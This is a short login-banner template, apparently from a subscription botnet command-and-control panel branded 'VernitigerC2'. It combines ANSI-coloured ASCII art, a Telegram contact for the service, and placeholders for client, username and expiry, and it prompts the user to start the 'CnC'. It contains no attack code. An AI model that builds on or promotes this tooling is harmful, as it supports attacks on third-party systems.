<<$clear>>
<redish>
<<sleep(8)>>\x1b[34m ▌ ▐·▄▄▄ .▄▄▄   ▐ ▄ ▪  ▄▄▄▄▄▪   ▄▄ • ▄▄▄ .▄▄▄  
<<sleep(16)>>▪█·█▌▀▄.▀·▀▄ █·•█▌▐███ •██  ██ ▐█ ▀ ▪▀▄.▀·▀▄ █·
<<sleep(24)>>▐█▐█•▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▐█· ▐█.▪▐█·▄█ ▀█▄▐▀▀▪▄▐▀▀▄ 
<<sleep(32)>> ███ ▐█▄▄▌▐█•█▌██▐█▌▐█▌ ▐█▌·▐█▌▐█▄▪▐█▐█▄▄▌▐█•█▌
<<sleep(39)>>. ▀   ▀▀▀ .▀  ▀▀▀ █▪▀▀▀ ▀▀▀ ▀▀▀·▀▀▀▀  ▀▀▀ .▀  ▀\x1b[0m
<<sleep(47)>>             \x1b[1m\x1b[34mt.me/VernitigerC2\x1b[0m

<<sleep(55)>>\x1b[34mLOGIN :\x1b[1m\x1b[37m <<$remoteclient>>\x1b[0m
<<sleep(63)>>\x1b[34mUSERNAME :\x1b[1m\x1b[37m <<$username>>\x1b[0m
<<sleep(71)>>\x1b[34mEXPIRED :\x1b[1m\x1b[37m <<$expiry>>\x1b[0m

<<sleep(79)>>Please Type \x1b[1m\x1b[34m"help"\x1b[0m For Start CnC
<<sleep(88)>>\x1b[34m________________________________________________________________________________\x1b[0m
</>
